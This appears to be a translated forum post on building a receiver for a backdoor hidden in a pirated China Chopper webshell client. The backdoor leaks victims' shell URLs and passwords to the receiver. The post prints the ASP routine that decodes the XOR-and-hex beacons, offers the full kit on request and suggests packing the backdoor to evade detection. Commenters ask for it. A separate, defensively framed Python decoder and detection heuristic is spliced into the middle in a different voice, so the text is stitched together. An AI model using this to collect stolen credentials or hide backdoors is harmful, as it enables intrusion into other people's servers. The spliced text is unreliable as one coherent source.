How to Build the "Three-Million" China Chopper Backdoor Box

Reverse engineering, Penetration testing, China Chopper, Backdoor, Source code, Reversing, Cracking

I'm sure you've all read the write-up on how the three-million-shell box behind the fake China Chopper official site got pwned, and some of you, like me, must have wondered: how is that chopper backdoor box actually built? So here's a walkthrough~

First, the backdoor lives in the chopper's db.tmp; load the file in WinHex and you'll find it.
[image: 1.png]

This is my modified copy, used for local testing.

We all know that software backdoors are usually detected by capturing their traffic, but this one slips past most packet-capture tools:
[image: 2.png]

So to get hold of the packet you need a somewhat less mainstream capture tool~

But even if you do capture it, you'll find the packet is encrypted, and without the key decryption file it's of no use at all.

[image: 3.png]

A packet carrying the shell address, password, configuration and so on:


So the heart of this backdoor box is the decryption function. The core decryption routine follows:

Public Function Decode(s)
Dim i, x
for i = 1 to len(s) step 2 ' rebuild the URL encoding: every hex pair becomes "%xx"
    x = x & "%" & mid(s, i, 2)
next
x = UrlDecode(x) ' call the URL-decoding helper below
Dim y, a
for i = 1 to len(x) step 2 ' XOR each hex pair back to its original value, then re-encode it as hex
    a = Int("&H" & mid(x, i, 2)) ' convert each hex pair to decimal
    a = a xor 6 ' undo the XOR obfuscation (single-byte key 6)
    y = y & chr(a) ' turn the ASCII code back into a character
next
x = ""
for i = 1 to len(y) step 2 ' rebuild the URL encoding a second time
    x = x & "%" & mid(y, i, 2)
next
x = UrlDecode(x) ' final URL-decode yields the plaintext
Decode = x
End Function

Public Function UrlDecode(S) ' URL-decoding helper
Dim I
For I = 1 To Len(S)
    If Mid(S, I, 1) = "%" Then
        If Int("&H" & Mid(S, I + 1, 2)) > 127 Then ' lead byte of a double-byte (GBK) character: consume two %xx groups
            UrlDecode = UrlDecode & Chr(Int("&H" & Mid(S, I + 1, 2) & Mid(S, I + 4, 2)))
            I = I + 5
        Else ' plain single-byte character
            UrlDecode = UrlDecode & Chr(Int("&H" & Mid(S, I + 1, 2)))
            I = I + 2
        End If
    Else ' not an escape: copy the character through unchanged
        UrlDecode = UrlDecode & Mid(S, I, 1)
    End If
Next
End Function

This is the ASP version of the decryption function, published by some expert online~ (PS: I don't have that kind of reverse-engineering chops, lol)

Anyone who needs it can write a PHP version from the source above, or ask me for the complete version~
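For an incident responder who captures one of these beacons and has to find out which shell URL and password were exposed, the same three layers are easier to reason about in Python. The block below is an added example, not code from the original post or from the decoder's author: it peels the layers exactly as the ASP Decode() above does (hex pairs, XOR with 6, hex pairs, hex pairs), returns None if any layer is not clean hex so it doubles as a cheap classifier over suspect POST bodies in proxy logs, and decodes the last layer as GBK because the ASP UrlDecode() joins bytes above 127 into double-byte characters. SAMPLE_BEACON is a constructed value (the wire form of the plaintext "/s.asp|pw"), not captured traffic, and the "url|password" layout of the plaintext is an assumption made only for the sample.

```python
"""Analyst-side decoder for the triple-layer beacon encoding described above."""
from __future__ import annotations

XOR_KEY = 6  # the single-byte key the page's Decode() applies with "a xor 6"

# Constructed sample (NOT captured traffic): the wire form of the plaintext
# "/s.asp|pw", built by hand by inverting the three layers below.
SAMPLE_BEACON = (
    "3334363033313335"
    "3334363333303337"
    "3331333533313336"
    "3331363533313336"
    "33313331"
)

HEX_CHARS = set("0123456789abcdefABCDEF")


def _unhex(text: str) -> bytes | None:
    """Turn a run of hex digit pairs into bytes; None if it is not clean hex."""
    if not text or len(text) % 2 or any(c not in HEX_CHARS for c in text):
        return None
    return bytes.fromhex(text)


def decode_beacon_bytes(wire: str) -> bytes | None:
    """Peel the three layers of the page's Decode(): hex -> xor 6 -> hex -> hex.

    Returns the raw plaintext bytes, or None if any layer is malformed, which
    makes the function usable as a yes/no check over suspect request bodies.
    """
    layer1 = _unhex(wire.strip())            # "%xx" pairs -> bytes (first UrlDecode)
    if layer1 is None:
        return None
    try:
        x = layer1.decode("ascii")           # must itself be a hex string
    except UnicodeDecodeError:
        return None
    layer2 = _unhex(x)                       # Int("&H" & pair) for each pair
    if layer2 is None:
        return None
    y = bytes(b ^ XOR_KEY for b in layer2)   # "a xor 6" undoes the obfuscation
    try:
        y_text = y.decode("ascii")           # again must be a hex string
    except UnicodeDecodeError:
        return None
    return _unhex(y_text)                    # final "%xx" pairs -> plaintext bytes


def decode_beacon(wire: str) -> str | None:
    """Plaintext as text. The ASP UrlDecode() joins bytes > 127 into double-byte
    (GBK) characters, so the same code page is applied to the last layer here."""
    raw = decode_beacon_bytes(wire)
    return None if raw is None else raw.decode("gbk", errors="replace")


def is_beacon(wire: str) -> bool:
    """True when a body survives all three layers: a triage filter for web
    server or proxy logs when hunting for this exfiltration channel."""
    return decode_beacon_bytes(wire) is not None


if __name__ == "__main__":
    print(decode_beacon(SAMPLE_BEACON))      # /s.asp|pw
    print(is_beacon("48656c6c6f"))           # False: "Hello" is plain hex, one layer only
```

Because every plaintext byte expands to eight hex characters on the wire, a body that is all hex digits, has a length divisible by eight and still parses as hex after the first two layers is a strong signal on its own; the XOR key and the nested hex are what separate this channel from ordinary hex-encoded uploads.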

[image: 4.png]

It receives the beacons perfectly~ If you're worried about the backdoor file being caught, you can pack it to make it harder to crack; test that yourself.

Finally, a reminder: this article is for technical reference and research only! Don't use it to do anything illegal! The author accepts no legal responsibility for anything arising from it! After all, there's always someone better out there~

Thanks once again to senior Xiaoting for all the help during this time!

Comments
    KEYONE
    2020-02-05 13:50

    Please get in touch with me by email: payload#aliyun.com

    sss
    2020-01-30 20:53

    What's your contact info, and how do I get the complete version? I'd like to study it.